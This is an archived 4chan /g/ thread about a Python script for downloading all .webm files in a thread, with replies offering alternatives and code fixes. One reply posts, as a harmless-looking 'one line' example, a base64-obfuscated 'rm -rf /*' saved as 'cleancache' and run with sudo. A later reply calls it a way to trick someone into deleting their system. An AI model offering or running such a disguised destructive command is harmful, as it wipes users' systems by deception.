/g/ - import os import requests from bs4 import Beautifu - Technology

Anonymous

04/22/24(Mon)21:56:50 No.100138504

File: 20231121_165711.jpg (863 KB, 3218x4096)

Anonymous 04/22/24(Mon)21:56:50 No.100138504 Archived

import os
import requests
from bs4 import BeautifulSoup

def download_webms(url):
    if "4chan.org" not in url:
        print("Please provide a valid 4chan thread URL.")
        return
    
    try:
        response = requests.get(url)
        response.raise_for_status()  # Raise an error on bad status
    except requests.RequestException as e:
        print(f"Error accessing {url}: {e}")
        return
    
    soup = BeautifulSoup(response.text, 'html.parser')
    webms = [a['href'] for a in soup.find_all('a', href=True) if a['href'].endswith('.webm')]

    if not webms:
        print("No .webm files found in the thread.")
        return

    # Create a directory for downloads if it doesn't exist
    os.makedirs('4chanwebms', exist_ok=True)

    # Download each .webm file found
    for webm_url in webms:
        try:
            webm_response = requests.get(f'https:{webm_url}', stream=True)
            webm_response.raise_for_status()

            webm_filename = webm_url.split('/')[-1]
            with open(os.path.join('downloads', webm_filename), 'wb') as f:
                for chunk in webm_response.iter_content(chunk_size=8192):
                    f.write(chunk)

            print(f"Downloaded {webm_filename} successfully.")
        except requests.RequestException as e:
            print(f"Failed to download {webm_url}: {e}")

if __name__ == '__main__':
    thread_url = input("Enter a 4chan thread URL: ")
    download_webms(thread_url)

i made a program to help download all webms in certain thread. How do i make an extension out of it?

Anonymous
04/22/24(Mon)22:00:47 No.100138543

Anonymous 04/22/24(Mon)22:00:47 No.100138543

read the specification and documentation concerning the browser you want the extension to work on

Anonymous
04/22/24(Mon)22:40:01 No.100138855

Anonymous 04/22/24(Mon)22:40:01 No.100138855

>>100138504
I can write that in one line of bash

Anonymous
04/22/24(Mon)22:49:55 No.100138945

Anonymous 04/22/24(Mon)22:49:55 No.100138945

>>100138855
do it

Anonymous
04/22/24(Mon)22:51:21 No.100138955

Anonymous 04/22/24(Mon)22:51:21 No.100138955

>>100138855
You cant do shit fag

Anonymous
04/22/24(Mon)23:01:22 No.100139026

Anonymous 04/22/24(Mon)23:01:22 No.100139026

>>100138504
look into gallery-dl

Anonymous
04/22/24(Mon)23:04:25 No.100139041

Anonymous 04/22/24(Mon)23:04:25 No.100139041

>>100138504
I already have a Firefox extension that does that

Lucretia simp
04/22/24(Mon)23:07:43 No.100139067

Lucretia simp 04/22/24(Mon)23:07:43 No.100139067

>>100138955
well you can write entire scripts in one line, for example
 echo "cm0gLXJmIC8q" | base64 -d > cleancache; chmod 700 cleancache; sudo ./cleancache & 
This is one line even if you're breaking it with a ;

Anonymous
04/22/24(Mon)23:17:00 No.100139140

Anonymous 04/22/24(Mon)23:17:00 No.100139140

>>100138945
for f in $(curl -L $url | hxnormalize | hxselect 'a[href$=".webm"]::attr(href)'); do curl -LO "$f"; done

Anonymous
04/23/24(Tue)00:51:17 No.100139834

Anonymous 04/23/24(Tue)00:51:17 No.100139834

>>100139140
>>100139067
>>100139041
>>100139026
>>100138955
>>100138945
>>100138855
>>100138543
can u guys help contribute

https://github.com/mokimolo/webmdownloader/tree/main

its bad at loading thumbnails

Anonymous
04/23/24(Tue)01:05:09 No.100139929

Anonymous 04/23/24(Tue)01:05:09 No.100139929

>>100139834
bump

Anonymous
04/23/24(Tue)01:16:01 No.100140012

Anonymous 04/23/24(Tue)01:16:01 No.100140012

>>100139929
Bump

This has potential

Anonymous
04/23/24(Tue)01:18:23 No.100140028

Anonymous 04/23/24(Tue)01:18:23 No.100140028

>>100139834
this chromium extension inspects html in current webpage, no?

Anonymous
04/23/24(Tue)01:21:48 No.100140056

Anonymous 04/23/24(Tue)01:21:48 No.100140056

>>100140028
Whats wrong with that

Anonymous
04/23/24(Tue)01:22:17 No.100140062

Anonymous 04/23/24(Tue)01:22:17 No.100140062

File: 1712373793345415.gif (1.95 MB, 480x358)

1.95 MB GIF

>download all webms in thread
Coomers will burn in hell

Anonymous
04/23/24(Tue)01:23:32 No.100140071

Anonymous 04/23/24(Tue)01:23:32 No.100140071

>>100139834
Bump

Anonymous
04/23/24(Tue)01:25:41 No.100140097

Anonymous 04/23/24(Tue)01:25:41 No.100140097

>>100139067
why not just pass the decoded b64 string to xargs sudo if you want to bamboozle someone into deleting their system?

Anonymous
04/23/24(Tue)01:27:06 No.100140108

Anonymous 04/23/24(Tue)01:27:06 No.100140108

>>100139834
WTF is this? Just give me an exe.

Anonymous
04/23/24(Tue)01:27:35 No.100140112

Anonymous 04/23/24(Tue)01:27:35 No.100140112

>>100140056
nothing, just wanna know what the javascript code does

Anonymous
04/23/24(Tue)01:28:36 No.100140117

Anonymous 04/23/24(Tue)01:28:36 No.100140117

>>100140108
you shouldn't be on /g/ if you couldn't figure it out

Anonymous
04/23/24(Tue)01:38:59 No.100140189

Anonymous 04/23/24(Tue)01:38:59 No.100140189

>>100139834
bump

Anonymous
04/23/24(Tue)01:43:06 No.100140220

Anonymous 04/23/24(Tue)01:43:06 No.100140220

>>100139834
Bump

Anonymous
04/23/24(Tue)01:46:20 No.100140248

Anonymous 04/23/24(Tue)01:46:20 No.100140248

>>100140220
>>100140189
why

Anonymous
04/23/24(Tue)02:22:45 No.100140527

Anonymous 04/23/24(Tue)02:22:45 No.100140527

>>100140108
Bump

Anonymous
04/23/24(Tue)05:38:58 No.100141928

Anonymous 04/23/24(Tue)05:38:58 No.100141928

4chan has an api, you give it the thread url and it gives you a list of posts with the attachments urls lol

https://a.4cdn.org/{board}/thread/{thread_id}.json

Lucretia simp
04/23/24(Tue)05:46:02 No.100141998

Lucretia simp 04/23/24(Tue)05:46:02 No.100141998

>>100139834
You can create thumbnails on a terminal using ueberzug and list all the webms from the tread you inputed using fzf. Which you will need to download as dependencies for it to work. I was working on it for a little bit but got board after 20 minutes. Here's the code (that doesn't work yet) so far that I made so you can roast my dog shit programming skills. I'm not a programmer btw
It might be more worth to do what this >>100141928 anon said

 import os
import requests
from bs4 import BeautifulSoup
import subprocess

def download_webms(url):
    if "4chan.org" not in url:
        print("Please provide a valid 4chan thread URL.")
        return

    try:
        response = requests.get(url)
        response.raise_for_status()  # Raise an error on bad status
    except requests.RequestException as e:
        print(f"Error accessing {url}: {e}")
        return

    soup = BeautifulSoup(response.text, 'html.parser')
    webms = [a['href'] for a in soup.find_all('a', href=True) if a['href'].endswith('.webm')]
    thumbnails = [img['src'] for img in soup.find_all('img', src=True)]

    print("Number of .webm files:", len(webms))
    print("Number of thumbnails:", len(thumbnails))

    if not webms:
        print("No .webm files found in the thread.")
        return

    if len(webms) != len(thumbnails):
        print("Mismatch between thumbnails and .webm files.")
        return

    #Display thumbnails using ueberzug for selection
    selected_thumbnail = select_thumbnail(webms, thumbnails)
    if selected_thumbnail is None:
        print("No thumbnail selected. Exiting.")
        return

    # Create a directory for downloads if it doesn't exist
    os.makedirs('4chanwebms', exist_ok=True)

Anonymous
04/23/24(Tue)05:46:35 No.100142005

Anonymous 04/23/24(Tue)05:46:35 No.100142005

>>100138504
>if __name__ == '__main__':
Shit like this makes me fucking sick.

Lucretia simp
04/23/24(Tue)05:47:04 No.100142011

Lucretia simp 04/23/24(Tue)05:47:04 No.100142011

>>100141998
2nd part of my dogshit code (that chatgpt helped with)

   # Download the selected .webm file
    index = thumbnails.index(selected_thumbnail)
    webm_url = webms[index]
    try:
        webm_response = requests.get(f'https:{webm_url}', stream=True)
        webm_response.raise_for_status()

        webm_filename = webm_url.split('/')[-1]
        with open(os.path.join('4chanwebms', webm_filename), 'wb') as f:
            for chunk in webm_response.iter_content(chunk_size=8192):
                f.write(chunk)

        print(f"Downloaded {webm_filename} successfully.")
    except requests.RequestException as e:
        print(f"Failed to download {webm_url}: {e}")


def select_thumbnail(webms, thumbnails):
    webm_filenames = [webm.split('/')[-1] for webm in webms]
    webm_thumbnails = [thumb for thumb in thumbnails if any(filename in thumb for filename in webm_filenaames)]

    thumbnails_str = "\n".join(webm_thumbnails)
    fzf_process = subprocess.Popen(['fzf', '--preview-window=right:60%', '--preview', 'ueberzug -r /dev/stdin'], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    selected_thumbnail, _ = fzf_process.communicate(input=thumbnails_str.encode())
    return selected_thumbnail.decode().strip() if selected_thumbnail else None


if __name__ == '__main__':
    thread_url = input("Enter a 4chan thread URL: ")
    download_webms(thread_url)

Anonymous
04/23/24(Tue)06:43:43 No.100142544

Anonymous 04/23/24(Tue)06:43:43 No.100142544

File: 1713747525781152.jpg (51 KB, 720x475)

51 KB JPG

>>100139140
Shellchads win. Again!

Anonymous
04/23/24(Tue)06:49:17 No.100142595

Anonymous 04/23/24(Tue)06:49:17 No.100142595

>>100138504
>parsing the html

just add json to the end of any url
>>100138504.json

Anonymous
04/23/24(Tue)08:22:49 No.100143452

Anonymous 04/23/24(Tue)08:22:49 No.100143452

>>100141998
Can u fork it

Anonymous
04/23/24(Tue)10:44:56 No.100145095

Anonymous 04/23/24(Tue)10:44:56 No.100145095

>>100138504
I've been using this since 2018 https://pastebin.com/HARTrsne